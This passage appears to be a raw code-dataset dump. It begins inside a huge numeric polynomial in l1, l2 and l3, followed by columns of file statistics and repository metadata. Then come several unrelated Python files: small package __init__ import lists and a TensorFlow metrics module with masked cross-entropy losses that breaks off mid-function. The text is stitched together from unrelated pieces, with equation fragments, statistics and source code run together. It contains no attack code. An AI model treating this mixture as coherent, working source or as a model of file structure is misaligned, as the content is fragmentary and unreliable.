7.73056943458504e+16*l1*l2**4*l3**8 - 103340518758355.0*l1*l2**4*l3**7 - 44515826993855.4*l1*l2**4*l3**6 + 183138292296.613*l1*l2**4*l3**5 + 920235835.981313*l1*l2**4*l3**3 + 207053063.095684*l1*l2**4*l3**2 - 3639604.62473058*l1*l2**4*l3 - 1637822.08112871*l1*l2**4 + 1.83236936489057e+31*l1*l2**3*l3**24 + 2.22246717348215e+31*l1*l2**3*l3**23 - 4.81665861721014e+29*l1*l2**3*l3**22 - 7.36156612750679e+29*l1*l2**3*l3**21 + 5.94548272069079e+27*l1*l2**3*l3**20 + 1.27852287065844e+28*l1*l2**3*l3**19 - 4.90589460725723e+25*l1*l2**3*l3**18 - 1.52961052409931e+26*l1*l2**3*l3**17 + 
2.08979415388265e+23*l1*l2**3*l3**16 + 1.18461666638288e+24*l1*l2**3*l3**15 - 8.06455396519218e+20*l1*l2**3*l3**14 - 6.79179229549713e+21*l1*l2**3*l3**13 + 4.1766951030246e+18*l1*l2**3*l3**12 + 2.54725188797206e+19*l1*l2**3*l3**11 + 275546599684629.0*l1*l2**3*l3**10 - 4.19650236898362e+16*l1*l2**3*l3**9 - 132193690178506.0*l1*l2**3*l3**8 + 6786265918012.43*l1*l2**3*l3**7 + 289968962802.74*l1*l2**3*l3**6 + 41206115766.7304*l1*l2**3*l3**5 - 828212252.382836*l1*l2**3*l3**4 - 55214150.158832*l1*l2**3*l3**3 + 5823367.39956892*l1*l2**3*l3**2 + 1310257.66490298*l1*l2**3*l3 + 19107.9242798353*l1*l2**3 - 3.68997797723142e+30*l1*l2**2*l3**25 - 3.76392897226075e+30*l1*l2**2*l3**24 + 1.02708033015004e+29*l1*l2**2*l3**23 + 1.23583635354126e+29*l1*l2**2*l3**22 - 1.47467462911888e+27*l1*l2**2*l3**21 - 2.09020078171245e+27*l1*l2**2*l3**20 + 2.20482253083932e+25*l1*l2**2*l3**19 + 2.6807661521494e+25*l1*l2**2*l3**18 - 2.66112069022096e+23*l1*l2**2*l3**17 - 2.30529342847501e+23*l1*l2**2*l3**16 + 2.89857254535078e+21*l1*l2**2*l3**15 + 1.72712906023934e+21*l1*l2**2*l3**14 - 2.10040514182907e+19*l1*l2**2*l3**13 - 9.24676580680087e+18*l1*l2**2*l3**12 + 8.10777251571626e+16*l1*l2**2*l3**11 + 2.48240889157725e+16*l1*l2**2*l3**10 - 140557262800862.0*l1*l2**2*l3**9 - 36032994596330.6*l1*l2**2*l3**8 + 91569146148.3175*l1*l2**2*l3**7 + 20603057883.3449*l1*l2**2*l3**6 + 552141501.588625*l1*l2**2*l3**5 - 41410612.6191875*l1*l2**2*l3**4 - 9462972.02429922*l1*l2**2*l3**3 - 982693.248677237*l1*l2**2*l3**2 + 57323.7728395062*l1*l2**2*l3 + 12897.8488888889*l1*l2**2 + 4.13923658184646e+29*l1*l2*l3**26 + 3.86160485989334e+29*l1*l2*l3**25 - 9.35873267272708e+27*l1*l2*l3**24 - 1.07451589011108e+28*l1*l2*l3**23 + 8.27486298625504e+25*l1*l2*l3**22 + 1.16490573648685e+26*l1*l2*l3**21 - 2.87728784800852e+24*l1*l2*l3**20 - 1.13673471325123e+24*l1*l2*l3**19 + 6.30276273830536e+22*l1*l2*l3**18 + 6.2329119108971e+21*l1*l2*l3**17 - 9.71610458779826e+20*l1*l2*l3**16 - 1.1604073516703e+20*l1*l2*l3**15 + 
7.97290026732246e+18*l1*l2*l3**14 + 1.15254558374684e+18*l1*l2*l3**13 - 2.89549473608414e+16*l1*l2*l3**12 - 3.59463837875438e+15*l1*l2*l3**11 + 19727875072336.2*l1*l2*l3**10 + 6146879639346.01*l1*l2*l3**9 + 91569146148.2379*l1*l2*l3**8 + 0.0040625*l1*l2*l3**7 - 92023583.598083*l1*l2*l3**6 + 82821225.2383171*l1*l2*l3**5 + 2911683.6997843*l1*l2*l3**4 - 655128.832451491*l1*l2*l3**3 - 28661.886419753*l1*l2*l3**2 - 1.47792889038101e-14*l1*l2 - 1.51435484701699e+28*l1*l3**27 - 1.59007258936784e+28*l1*l3**26 - 2.51793887439983e+26*l1*l3**25 + 5.53781060650536e+25*l1*l3**24 + 2.22586529156674e+25*l1*l3**23 + 1.57377026708005e+25*l1*l3**22 + 3.99304967376919e+22*l1*l3**21 - 3.54715729904823e+23*l1*l3**20 - 1.01622034954407e+22*l1*l3**19 + 4.6797261541316e+21*l1*l3**18 + 2.56785908573918e+20*l1*l3**17 - 1.95974126052777e+19*l1*l3**16 - 2.97340503850803e+18*l1*l3**15 - 9.32059128798025e+16*l1*l3**14 + 1.79522333300132e+16*l1*l3**13 + 1.22808672542497e+15*l1*l3**12 - 63015326381596.8*l1*l3**11 - 8554388262644.34*l1*l3**10 + 96656320934.2778*l1*l3**9 + 20603057883.3578*l1*l3**8 - 1.26953125e-5*l1*l3**7 - 27607075.0794327*l1*l3**6 - 727920.924946049*l1*l3**5 + 327564.416225743*l1*l3**4 + 19107.9242798353*l1*l3**3 + 5.04466394583384e-12*l1*l3**2 - 151.146666666667*l1*l3 - 22.672*l1 - 1.00956989801133e+28*l2**28 + 2.2715322705255e+29*l2**27*l3 - 3.78588711754249e+27*l2**27 - 2.17562313021442e+30*l2**26*l3**2 + 9.08612908210198e+28*l2**26*l3 + 2.23167341434005e+26*l2**26 + 1.29881167379158e+31*l2**25*l3**3 - 9.24513634103878e+29*l2**25*l3**2 - 8.81324380344727e+27*l2**25*l3 + 7.20153053120695e+25*l2**25 - 5.59655072962583e+31*l2**24*l3**4 + 5.86055325795579e+30*l2**24*l3**3 + 8.94629914421895e+28*l2**24*l3**2 - 3.35310867109797e+27*l2**24*l3 + 2.72594110739526e+24*l2**24 + 1.87350933823453e+32*l2**23*l3**5 - 2.68517829698819e+31*l2**23*l3**4 - 5.23347415512845e+29*l2**23*l3**3 + 3.68813432907783e+28*l2**23*l3**2 + 1.74047260393906e+26*l2**23*l3 + 1.55029501896947e+24*l2**23 - 
5.08727319457401e+32*l2**22*l3**6 + 9.58859202034224e+31*l2**22*l3**5 + 2.14676243103386e+30*l2**22*l3**4 - 2.31276606358881e+29*l2**22*l3**3 - 1.9681702726721e+27*l2**22*l3**2 + 6.11146877813028e+25*l2**22*l3 - 1.0032523596717e+23*l2**22 + 1.15111664556201e+33*l2**21*l3**7 - 2.79078183224492e+32*l2**21*l3**6 - 6.74171496346344e+30*l2**21*l3**5 + 1.01569388380189e+30*l2**21*l3**4 + 1.12958497848276e+28*l2**21*l3**3 - 7.81438206491061e+26*l2**21*l3**2 - 2.87123850387217e+24*l2**21*l3 - 5.46734151857774e+22*l2**21 - 2.20856034813704e+33*l2**20*l3**8 + 6.81441508899486e+32*l2**20*l3**7 + 1.70035738953826e+31*l2**20*l3**6 - 3.42345322132681e+30*l2**20*l3**5 - 4.38317889931698e+28*l2**20*l3**4 + 4.86755393025982e+27*l2**20*l3**3 + 3.05958959319423e+25*l2**20*l3**2 - 8.99268235589536e+23*l2**20*l3 + 2.35680507407901e+21*l2**20 + 3.63164502852433e+33*l2**19*l3**9 - 1.42375099651997e+33*l2**19*l3**8 - 3.54417986577029e+31*l2**19*l3**7 + 9.31520517326371e+30*l2**19*l3**6 + 1.28086602580511e+29*l2**19*l3**5 - 2.0375665327102e+28*l2**19*l3**4 - 1.6135455973139e+26*l2**19*l3**3 + 1.15312351172102e+25*l2**19*l3**2 + 2.96341941797968e+22*l2**19*l3 + 1.15975624578853e+21*l2**19 - 5.14551528199029e+33*l2**18*l3**10 + 2.58094222415832e+33*l2**18*l3**9 + 6.21241099400372e+31*l2**18*l3**8 - 2.1112226040968e+31*l2**18*l3**7 - 2.97281469679973e+29*l2**18*l3**6 + 6.43158774640144e+28*l2**18*l3**5 + 5.70123693109003e+26*l2**18*l3**4 - 6.70830637646399e+25*l2**18*l3**3 - 3.04031353995489e+23*l2**18*l3**2 + 7.74126278400904e+21*l2**18*l3 - 2.58877731146049e+19*l2**18 + 6.2817054366102e+33*l2**17*l3**11 - 4.09994311184597e+33*l2**17*l3**10 - 9.24608246070814e+31*l2**17*l3**9 + 4.06878972587034e+31*l2**17*l3**8 + 5.64805463857197e+29*l2**17*l3**7 - 1.62148027720254e+29*l2**17*l3**6 - 1.51017644236238e+27*l2**17*l3**5 + 2.58101092539404e+26*l2**17*l3**4 + 1.475579364299e+24*l2**17*l3**3 - 1.06533361740797e+23*l2**17*l3**2 - 2.37961964785146e+20*l2**17*l3 - 1.21980582180189e+19*l2**17 - 
6.56183079621141e+33*l2**16*l3**12 + 5.74772170701425e+33*l2**16*l3**11 + 1.17194307608658e+32*l2**16*l3**10 - 6.7626378163287e+31*l2**16*l3**9 - 8.93380048046124e+29*l2**16*l3**8 + 3.37764132250519e+29*l2**16*l3**7 + 3.15839914383489e+27*l2**16*l3**6 - 7.43807421344062e+26*l2**16*l3**5 - 4.71620235782208e+24*l2**16*l3**4 + 5.81097931537397e+23*l2**16*l3**3 + 2.04951201066216e+21*l2**16*l3**2 - 5.35303134712672e+19*l2**16*l3 + 2.89435966114528e+17*l2**16 + 5.75448279662123e+33*l2**15*l3**13 - 7.14550681814985e+33*l2**15*l3**12 - 1.2592859341235e+32*l2**15*l3**11 + 9.78830363229644e+31*l2**15*l3**10 + 1.1855488534464e+30*l2**15*l3**9 - 5.93935057087417e+29*l2**15*l3**8 - 5.36899360659219e+27*l2**15*l3**7 + 1.70235677463826e+27*l2**15*l3**6 + 1.12400101408047e+25*l2**15*l3**5 - 2.04059754216096e+24*l2**15*l3**4 - 8.82527427765777e+21*l2**15*l3**3 + 6.58832867950176e+20*l2**15*l3**2 + 9.14430510973431e+17*l2**15*l3 + 1.08897304118968e+17*l2**15 - 4.04020282270105e+33*l2**14*l3**14 + 7.90134328044131e+33*l2**14*l3**13 + 1.12852607473864e+32*l2**14*l3**12 - 1.2418561129123e+32*l2**14*l3**11 - 1.31841783030856e+30*l2**14*l3**10 + 8.94146634108867e+29*l2**14*l3**9 + 7.52403339544854e+27*l2**14*l3**8 - 3.20110574316003e+27*l2**14*l3**7 - 2.09818107835999e+25*l2**14*l3**6 + 5.31897683763671e+24*l2**14*l3**5 + 2.48416385732807e+22*l2**14*l3**4 - 3.21019833577002e+21*l2**14*l3**3 - 7.33091115846775e+18*l2**14*l3**2 + 1.37993169718117e+17*l2**14*l3 - 2.94094700641135e+15*l2**14 + 1.95330069512386e+33*l2**13*l3**15 - 7.78259438793505e+33*l2**13*l3**14 - 8.08534666752381e+31*l2**13*l3**13 + 1.38661713698801e+32*l2**13*l3**12 + 1.21288019697104e+30*l2**13*l3**11 - 1.16305165566805e+30*l2**13*l3**10 - 8.72609180220649e+27*l2**13*l3**9 + 5.04831046896024e+27*l2**13*l3**8 + 3.15725964653863e+25*l2**13*l3**7 - 1.09235507030944e+25*l2**13*l3**6 - 5.24820201581225e+22*l2**13*l3**5 + 9.94762684058788e+21*l2**13*l3**4 + 2.97572029567185e+19*l2**13*l3**3 - 
2.01435875343622e+18*l2**13*l3**2 + 1.17304123867687e+15*l2**13*l3 - 921974667013770.0*l2**13 - 1.21718794753737e+32*l2**12*l3**16 + 6.8278989045527e+33*l2**12*l3**15 + 4.06796947515196e+31*l2**12*l3**14 - 1.36519862914053e+32*l2**12*l3**13 - 8.89971928178623e+29*l2**12*l3**12 + 1.31439343213508e+30*l2**12*l3**11 + 8.30384938006026e+27*l2**12*l3**10 - 6.76456703547525e+27*l2**12*l3**9 - 3.86777599085638e+25*l2**12*l3**8 + 1.82965734584195e+25*l2**12*l3**7 + 8.63066271919376e+22*l2**12*l3**6 - 2.29103166557257e+22*l2**12*l3**5 - 7.37017734355483e+19*l2**12*l3**4 + 9.2143397175672e+18*l2**12*l3**3 + 6.06564240720749e+15*l2**12*l3**2 + 1.18873356433482e+15*l2**12*l3 + 10853921906672.0*l2**12 - 1.02863057768579e+33*l2**11*l3**17 - 5.32763361503234e+33*l2**11*l3**16 - 5.32534170601314e+30*l2**11*l3**15 + 1.18518154596569e+32*l2**11*l3**14 + 4.67283065612432e+29*l2**11*l3**13 - 1.29400558937396e+30*l2**11*l3**12 - 6.30060554892603e+27*l2**11*l3**11 + 7.7603671104999e+27*l2**11*l3**10 + 3.85424083932876e+25*l2**11*l3**9 - 2.54747049706514e+25*l2**11*l3**8 - 1.13952464457727e+23*l2**11*l3**7 + 4.13338082163177e+22*l2**11*l3**6 + 1.40102916586409e+20*l2**11*l3**5 - 2.48043371032539e+19*l2**11*l3**4 - 4.75140215420597e+16*l2**11*l3**3 - 628214330697441.0*l2**11*l3**2 - 4100997431191.59*l2**11*l3 + 3073439819674.34*l2**11 + 1.42103020564483e+33*l2**10*l3**18 + 3.68576100376743e+33*l2**10*l3**17 - 1.6508569858984e+31*l2**10*l3**16 - 9.05492662969835e+31*l2**10*l3**15 - 9.27047064685706e+28*l2**10*l3**14 + 1.10982865672962e+30*l2**10*l3**13 + 3.50513926971911e+27*l2**10*l3**12 - 7.64999068921383e+27*l2**10*l3**11 - 3.06050659010777e+25*l2**10*l3**10 + 2.98254511003906e+25*l2**10*l3**9 + 1.20856528272785e+23*l2**10*l3**8 - 6.04939199979419e+22*l2**10*l3**7 - 2.03669387597944e+20*l2**10*l3**6 + 5.00916546236163e+19*l2**10*l3**5 + 1.07412532882038e+17*l2**10*l3**4 - 7.24777987533464e+15*l2**10*l3**3 + 6093789803944.96*l2**10*l3**2 - 3921723059427.38*l2**10*l3 - 
10174349572.0425*l2**10 - 1.26577854672865e+33*l2**9*l3**19 - 2.24981642201928e+33*l2**9*l3**18 + 2.35629094511411e+31*l2**9*l3**17 + 6.06396295962219e+31*l2**9*l3**16 - 1.35555637302166e+29*l2**9*l3**15 - 8.27162772560808e+29*l2**9*l3**14 - 9.78682114977138e+26*l2**9*l3**13 + 6.48045767361835e+27*l2**9*l3**12 + 1.8301265849852e+25*l2**9*l3**11 - 2.95069648008949e+25*l2**9*l3**10 - 1.02569867267147e+23*l2**9*l3**9 + 7.28403039576199e+22*l2**9*l3**8 + 2.39289321251191e+20*l2**9*l3**7 - 7.82007047817486e+19*l2**9*l3**6 - 1.99791924172391e+17*l2**9*l3**5 + 1.96381848821095e+16*l2**9*l3**4 + 48624646840369.0*l2**9*l3**3 + 7661094075476.84*l2**9*l3**2 - 10174349572.0208*l2**9*l3 - 2289228653.70807*l2**9 + 8.74317818774755e+32*l2**8*l3**20 + 1.20316704079378e+33*l2**8*l3**19 - 2.04270973908306e+31*l2**8*l3**18 - 3.53674301746054e+31*l2**8*l3**17 + 2.0639653454597e+29*l2**8*l3**16 + 5.32877328745401e+29*l2**8*l3**15 - 5.68575216740126e+26*l2**8*l3**14 - 4.70200391906942e+27*l2**8*l3**13 - 6.68762797725978e+24*l2**8*l3**12 + 2.46801701439334e+25*l2**8*l3**11 + 6.68786030277964e+22*l2**8*l3**10 - 7.28378918170309e+22*l2**8*l3**9 - 2.20471468221933e+20*l2**8*l3**8 + 9.90767743560077e+19*l2**8*l3**7 + 2.54469731751776e+17*l2**8*l3**6 - 3.95775028338786e+16*l2**8*l3**5 - 62161272507557.3*l2**8*l3**4 - 1997793589128.78*l2**8*l3**3 + 0.01625*l2**8*l3 - 69017687.6985527*l2**8 - 4.91019463446282e+32*l2**7*l3**21 - 5.58181353303961e+32*l2**7*l3**20 + 1.33865887513479e+31*l2**7*l3**19 + 1.77950580934503e+31*l2**7*l3**18 - 1.74013179171235e+29*l2**7*l3**17 - 2.94148791415857e+29*l2**7*l3**16 + 1.06099282742869e+27*l2**7*l3**15 + 2.90098696850372e+27*l2**7*l3**14 - 6.25474235543049e+23*l2**7*l3**13 - 1.73684745593599e+25*l2**7*l3**12 - 3.04518862170354e+22*l2**7*l3**11 + 6.04089382781542e+22*l2**7*l3**10 + 1.60652601188005e+20*l2**7*l3**9 - 1.01611516938344e+20*l2**7*l3**8 - 2.73349947667765e+17*l2**7*l3**7 + 5.40554446243529e+16*l2**7*l3**6 + 127969585882587.0*l2**7*l3**5 + 
3940189089160.78*l2**7*l3**4 - 30523048715.9867*l2**7*l3**3 - 0.0216666666666667*l2**7*l3**2 + 184047167.196191*l2**7*l3 - 27607075.0794255*l2**7 + 2.26703968447935e+32*l2**6*l3**22 + 2.21583429925222e+32*l2**6*l3**21 - 6.97180739383862e+30*l2**6*l3**20 - 7.61930462708175e+30*l2**6*l3**19 + 1.07166067362341e+29*l2**6*l3**18 + 1.37296506583327e+29*l2**6*l3**17 - 8.87729811337886e+26*l2**6*l3**16 - 1.50377962087196e+27*l2**6*l3**15 + 3.20080509448519e+24*l2**6*l3**14 + 1.01843691055025e+25*l2**6*l3**13 + 5.4698189900193e+21*l2**6*l3**12 - 4.13579173254059e+22*l2**6*l3**11 - 8.39957814543636e+19*l2**6*l3**10 + 8.5401567657115e+19*l2**6*l3**9 + 2.08054066617124e+17*l2**6*l3**8 - 6.22271141623759e+16*l2**6*l3**7 - 108711055732046.0*l2**6*l3**6 + 2790678739725.17*l2**6*l3**5 - 30523048716.16*l2**6*l3**4 - 6867685961.08833*l2**6*l3**3 - 322082542.5935*l2**6*l3**2 + 96624762.7780195*l2**6*l3 + 1698482.1582075*l2**6 - 8.55055225120699e+31*l2**5*l3**23 - 7.38316133888904e+31*l2**5*l3**22 + 2.90648061014716e+30*l2**5*l3**21 + 2.72213499886909e+30*l2**5*l3**20 - 5.08664181238859e+28*l2**5*l3**19 - 5.31272651705254e+28*l2**5*l3**18 + 5.14292925211492e+26*l2**5*l3**17 + 6.42634262430194e+26*l2**5*l3**16 - 2.79862563931015e+24*l2**5*l3**15 - 4.88822135479522e+24*l2**5*l3**14 + 4.74626944923135e+21*l2**5*l3**13 + 2.29948747507005e+22*l2**5*l3**12 + 2.71518757728883e+19*l2**5*l3**11 - 5.75658091096447e+19*l2**5*l3**10 - 1.26105443983108e+17*l2**5*l3**9 + 5.39566308476022e+16*l2**5*l3**8 + 127300192305673.0*l2**5*l3**7 + 245829020512.549*l2**5*l3**6 + 0.0433333333333333*l2**5*l3**5 - 0.065*l2**5*l3**4 + 276070750.794313*l2**5*l3**3 - 207053063.095684*l2**5*l3**2 - 2911683.69978437*l2**5*l3 + 655128.832451507*l2**5 + 2.58096544426598e+31*l2**4*l3**24 + 2.00803452714454e+31*l2**4*l3**23 - 9.55130235616819e+29*l2**4*l3**22 - 7.88206328269235e+29*l2**4*l3**21 + 1.86120873487868e+28*l2**4*l3**20 + 1.65386179904594e+28*l2**4*l3**19 - 2.20393651468128e+26*l2**4*l3**18 - 
2.19847760780842e+26*l2**4*l3**17 + 1.54078078281025e+24*l2**4*l3**16 + 1.86775902024591e+24*l2**4*l3**15 - 5.52940355174729e+21*l2**4*l3**14 - 1.01462670361813e+22*l2**4*l3**13 + 2.07239533358408e+18*l2**4*l3**12 + 3.08485849221156e+19*l2**4*l3**11 + 3.9851485520438e+16*l2**4*l3**10 - 3.85654276204304e+16*l2**4*l3**9 - 61491878930609.9*l2**4*l3**8 + 6183811698759.31*l2**4*l3**7 - 30523048716.1031*l2**4*l3**6 + 0.0216666666666667*l2**4*l3**5 - 115029479.497613*l2**4*l3**4 + 276070750.794313*l2**4*l3**3 + 3639604.62473049*l2**4*l3**2 - 1637822.08112873*l2**4*l3 - 23884.9053497942*l2**4 - 6.00189304367738e+30*l2**3*l3**25 - 4.27275220085847e+30*l2**3*l3**24 + 2.38289833723965e+29*l2**3*l3**23 + 1.76771905719437e+29*l2**3*l3**22 - 5.08128884152279e+27*l2**3*l3**21 - 3.94698503342109e+27*l2**3*l3**20 + 6.91045357852832e+25*l2**3*l3**19 + 5.73528941962944e+25*l2**3*l3**18 - 5.86977913217567e+23*l2**3*l3**17 - 5.40978296710407e+23*l2**3*l3**16 + 3.03229862246318e+21*l2**3*l3**15 + 3.38406146001588e+21*l2**3*l3**14 - 7.32077590407829e+18*l2**3*l3**13 - 1.24055715473486e+19*l2**3*l3**12 - 2.62396962730852e+15*l2**3*l3**11 + 1.96226734171539e+16*l2**3*l3**10 + 39099253182229.8*l2**3*l3**9 - 3940189089132.25*l2**3*l3**8 - 30523048716.0896*l2**3*l3**7 - 6867685961.13167*l2**3*l3**6 - 92023583.598156*l2**3*l3**5 - 262267213.254668*l2**3*l3**4 - 970561.233261414*l2**3*l3**3 + 2620515.329806*l2**3*l3**2 + 19107.9242798354*l2**3*l3 - 8598.56592592592*l2**3 + 1.00452204852128e+30*l2**2*l3**26 + 6.63287422993446e+29*l2**2*l3**25 - 4.19630657663918e+28*l2**2*l3**24 - 2.84304066309756e+28*l2**2*l3**23 + 9.60960469207655e+26*l2**2*l3**22 + 6.63388375332177e+26*l2**2*l3**21 - 1.49569748632188e+25*l2**2*l3**20 - 1.04666496900198e+25*l2**2*l3**19 + 1.5299414041611e+23*l2**2*l3**18 + 1.09027307822277e+23*l2**2*l3**17 - 1.07969770469313e+21*l2**2*l3**16 - 7.91954229352461e+20*l2**2*l3**15 + 4.77098607155207e+18*l2**2*l3**14 + 3.57411388068045e+18*l2**2*l3**13 - 
1.03273588899684e+16*l2**2*l3**12 - 7.60837356065786e+15*l2**2*l3**11 + 5870658611619.66*l2**2*l3**10 + 5317062429303.04*l2**2*l3**9 - 0.00541666666666667*l2**2*l3**8 + 0.0270833333333333*l2**2*l3**7 + 138035375.397169*l2**2*l3**6 + 165642450.476572*l2**2*l3**5 - 727920.924946151*l2**2*l3**4 - 2292950.91358031*l2**2*l3**3 - 14330.9432098765*l2**2*l3**2 + 12897.8488888889*l2**2*l3 + 151.146666666667*l2**2 - 1.0600483929119e+29*l2*l3**27 - 6.58744358452394e+28*l2*l3**26 + 4.48257203669889e+27*l2*l3**25 + 2.81691550679425e+27*l2*l3**24 - 1.06174926213834e+26*l2*l3**23 - 6.56030601960472e+25*l2*l3**22 + 1.91180550502586e+24*l2*l3**21 + 1.10350170466454e+24*l2*l3**20 - 2.37939664666022e+22*l2*l3**19 - 1.24604181975251e+22*l2*l3**18 + 2.25842237192906e+20*l2*l3**17 + 1.06246824616996e+20*l2*l3**16 - 1.43117477482551e+18*l2*l3**15 - 5.92912381793402e+17*l2*l3**14 + 4.62003345100304e+15*l2*l3**13 + 1.56761545833907e+15*l2*l3**12 - 3877866238868.07*l2*l3**11 - 1678100449795.27*l2*l3**10 - 10174349572.0263*l2*l3**9 - 0.00270833333333333*l2*l3**8 - 92023583.5981465*l2*l3**7 - 69017687.6985845*l2*l3**6 + 1455841.84989223*l2*l3**5 + 1310257.66490298*l2*l3**4 - 9553.96213991775*l2*l3**3 - 12897.8488888889*l2*l3**2 + 2.95585778076202e-14*l2*l3 + 45.344*l2 + 5.04784949005666e+27*l3**28 + 3.028709694034e+27*l3**27 - 1.9218165818031e+26*l3**26 - 1.14891744514372e+26*l3**25 + 4.09875000487826e+24*l3**24 + 2.16805902283681e+24*l3**23 - 9.9520265228209e+22*l3**22 - 3.56564749885582e+22*l3**21 + 1.83431186728448e+21*l3**20 + 4.09510107547028e+20*l3**19 - 2.87004615188914e+19*l3**18 - 5.09702423598348e+18*l3**17 + 2.94345079852047e+17*l3**16 + 4.57412196448806e+16*l3**15 - 1.71471144347053e+15*l3**14 - 215054014135696.0*l3**13 + 6091225077586.03*l3**12 + 930226246585.369*l3**11 - 10174349572.0276*l3**10 - 2289228653.70536*l3**9 + 23005895.8995303*l3**8 + 13803537.5397159*l3**7 - 485280.616630742*l3**6 - 327564.416225742*l3**5 + 4776.98106995889*l3**4 + 4299.28296296296*l3**3 - 22.672*l3 
- 0.21255
| 29,126.5
| 174,620
| 0.678317
| 36,256
| 174,759
| 3.26939
| 0.127289
| 0.011111
| 0.014806
| 0.001417
| 0.292859
| 0.130038
| 0.002818
| 0
| 0
| 0
| 0
| 0.616578
| 0.051568
| 174,759
| 6
| 174,620
| 29,126.5
| 0.098578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
7db4353f50f871971e957924fdf428480f9cf91e
| 36
|
py
|
Python
|
smart_flies/__init__.py
|
AdamSpannbauer/py_smart_flies
|
40b91651779c441be45f8a92841409f32acf1442
|
[
"MIT"
] | null | null | null |
smart_flies/__init__.py
|
AdamSpannbauer/py_smart_flies
|
40b91651779c441be45f8a92841409f32acf1442
|
[
"MIT"
] | null | null | null |
smart_flies/__init__.py
|
AdamSpannbauer/py_smart_flies
|
40b91651779c441be45f8a92841409f32acf1442
|
[
"MIT"
] | null | null | null |
from .smart_flies import SmartFlies
| 18
| 35
| 0.861111
| 5
| 36
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7db906dd3b0248ca00d636cfc0f01c4c415e3cd6
| 283
|
py
|
Python
|
roomai/common/__init__.py
|
yooyoo2004/RoomAI
|
7f4d655581a03ded801f6c6d7d18f9fff47aa6f5
|
[
"MIT"
] | null | null | null |
roomai/common/__init__.py
|
yooyoo2004/RoomAI
|
7f4d655581a03ded801f6c6d7d18f9fff47aa6f5
|
[
"MIT"
] | null | null | null |
roomai/common/__init__.py
|
yooyoo2004/RoomAI
|
7f4d655581a03ded801f6c6d7d18f9fff47aa6f5
|
[
"MIT"
] | 1
|
2021-08-15T16:19:01.000Z
|
2021-08-15T16:19:01.000Z
|
#!/bin/python
from common import AbstractPlayer
from common import AbstractEnv
from common import AbstractPublicState
from common import AbsractPersonState
from common import AbstractPrivateState
from common import AbstractAction
from common import PokerCard
from common import Info
| 28.3
| 39
| 0.869258
| 34
| 283
| 7.235294
| 0.382353
| 0.325203
| 0.520325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116608
| 283
| 9
| 40
| 31.444444
| 0.984
| 0.042403
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8148d1678f231380cff15f6092f27979a7c3d40b
| 24
|
py
|
Python
|
wxparams/__init__.py
|
Yoshiki443/weather_parameters
|
ae2c9ed02f68968cb6ea0610d556f3c68bbc923e
|
[
"MIT"
] | 17
|
2020-04-26T20:25:56.000Z
|
2022-03-10T09:41:54.000Z
|
wxparams/__init__.py
|
Yoshiki443/weather_parameters
|
ae2c9ed02f68968cb6ea0610d556f3c68bbc923e
|
[
"MIT"
] | null | null | null |
wxparams/__init__.py
|
Yoshiki443/weather_parameters
|
ae2c9ed02f68968cb6ea0610d556f3c68bbc923e
|
[
"MIT"
] | 1
|
2020-06-08T04:54:30.000Z
|
2020-06-08T04:54:30.000Z
|
from .wxparams import *
| 12
| 23
| 0.75
| 3
| 24
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8149d602509089a5e93b1791acb98401d56d85f2
| 6,489
|
py
|
Python
|
Uncertainty-GNN/metrics.py
|
YuzhouLin/uncertainty-GNN
|
14f68353ea7b66c17a86497760ef4ceca197304c
|
[
"MIT"
] | 22
|
2020-10-23T01:27:11.000Z
|
2022-03-08T15:37:55.000Z
|
Uncertainty-GNN/metrics.py
|
YuzhouLin/uncertainty-GNN
|
14f68353ea7b66c17a86497760ef4ceca197304c
|
[
"MIT"
] | 1
|
2021-02-08T16:40:57.000Z
|
2021-05-01T16:01:21.000Z
|
Uncertainty-GNN/metrics.py
|
YuzhouLin/uncertainty-GNN
|
14f68353ea7b66c17a86497760ef4ceca197304c
|
[
"MIT"
] | 7
|
2020-10-28T09:36:17.000Z
|
2022-03-05T01:28:37.000Z
|
import tensorflow as tf
import numpy as np
import tensorflow_probability as tfp
tfd = tfp.distributions
def masked_softmax_cross_entropy(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_cross_entropy(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = tf.pow(1.5, preds) + 1.0
